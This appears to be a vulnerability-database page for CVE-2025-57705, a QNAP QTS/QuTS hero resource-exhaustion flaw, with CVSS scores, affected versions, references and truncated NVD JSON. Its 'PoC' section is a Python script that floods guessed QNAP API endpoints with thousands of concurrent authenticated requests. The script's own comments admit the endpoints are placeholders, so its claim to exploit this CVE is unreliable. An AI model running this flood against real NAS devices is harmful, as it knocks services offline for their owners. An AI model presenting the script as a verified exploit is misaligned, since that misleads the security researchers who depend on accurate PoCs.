CVE-2025-57705

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:qnap:quts_hero:h5.2.0.2737:build_20240417:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2782:build_20240601:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2789:build_20240607:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2802:build_20240620:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2823:build_20240711:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2737:build_20240417:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2744:build_20240424:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2782:build_20240601:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2802:build_20240620:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2823:build_20240711:*:*:*:*:*:* - VULNERABLE

QNAP QTS < 5.2.7.3256 build 20250913

QNAP QuTS hero h5.2.7.3256 < build 20250913

QNAP QuTS hero h5.3.1 < 3250 build 20250912

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-57705 PoC - QNAP Resource Exhaustion
# This PoC demonstrates the resource allocation vulnerability in QNAP QTS/QuTS hero
# NOTE: This is for authorized security testing only

import requests
import time
import concurrent.futures
from requests.auth import HTTPBasicAuth

TARGET_IP = "TARGET_IP"
USERNAME = "admin"
PASSWORD = "password"

def resource_exhaustion_request(session, endpoint):
    """Send request to exhaust system resources"""
    try:
        # Simulate resource allocation without limits
        # Replace with actual QNAP API endpoint
        response = session.get(
            f"https://{TARGET_IP}/cgi-bin/{endpoint}",
            auth=HTTPBasicAuth(USERNAME, PASSWORD),
            verify=False,
            timeout=5
        )
        return response.status_code
    except requests.exceptions.RequestException:
        return None

def exploit_cve_2025_57705():
    """Execute resource exhaustion attack"""
    session = requests.Session()
    
    print("[*] Starting CVE-2025-57705 Resource Exhaustion Test")
    print(f"[*] Target: {TARGET_IP}")
    
    # List of endpoints that allocate resources
    endpoints = [
        "api/storage.cgi",
        "api/file_share.cgi",
        "api/snapshot.cgi",
        "api/container.cgi"
    ]
    
    # Send concurrent requests to exhaust resources
    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
        for _ in range(1000):
            for endpoint in endpoints:
                executor.submit(resource_exhaustion_request, session, endpoint)
    
    print("[+] Attack completed - check system availability")

if __name__ == "__main__":
    exploit_cve_2025_57705()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-57705
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-57705
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-57705/
[4] VulDB https://vuldb.com/cve/CVE-2025-57705
[5] https://www.qnap.com/en/security-advisory/qsa-25-50

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-57705", "sourceIdentifier": "[email protected]", "published": "2026-01-02T15:16:03.243", "lastModified": "2026-01-05T19:44:29.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.7.3256 build 20250913 and later\nQuTS hero h5.2.7.3256 build 20250913 and later\nQuTS hero h5.3.1.3250 build 20250912 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2737:build_20240417:*:*:*:*:*:*", "matchCriteriaId": "CDCBB36A-CB91-4BA3-A6ED-952E6A4A0481"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2782:build_20240601:*:*:*:*:*:*", "matchCriteriaId": "240BCFF1-CCCB-4C07-8E2C-7F43F68407FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2789:build_20240607:*:*:*:*:*:*", "matchCriteriaId": "D3AF7276-77E0-474A-B10F-AC15BC5FCF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2802:build_20240620:*:*:*:*:*:*", "matchCriteriaId": "5FA8C3EC-B6C0-44A8-BC91-18E3E90C63AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2823:build_20240711:*:*:*:*:*:*", "matchCriteriaId": "889336D2-D9F7-4CC0-A22F-B837B5E77751"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2851:build_20240808:*:*:*:*:*:*", "matchCriteriaId": "98F72EB9-0EE3-416A-B9BB-2512F5203A5A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.0.2860:build_20240817:*:*:*:*:*:*", "matchCriteriaId": "9110382F-57C2-4C2E-82D1-3246C882B2C3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.1.2929:build_20241025:*:*:*:*:*:*", "matchCriteriaId": "DB92EFD7-47DD-4AAC-97BD-A2D4918FF4ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.1.2940:build_20241105:*:*:*:*:*:*", "matchCriteriaId": "78E38E23-1AD0-49E1-89FA-73DC2F496137"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.2.2952:build_20241116:*:*:*:*:*:*", "matchCriteriaId": "F2F302B6-26CC-4044-B480-4EBDBB90797F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.3.3006:build_20250108:*:*:*:*:*:*", "matchCriteriaId": "BF0093B6-8D38-4D1E-AD71-79299123C2B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.4.3070:build_20250312:*:*:*:*:*:*", "matchCriteriaId": "48A3CDAA-B0C6-4280-B1AC-DDD027F9D632"}, {"vulnerable": true, "criteria": "cpe: ... (truncated)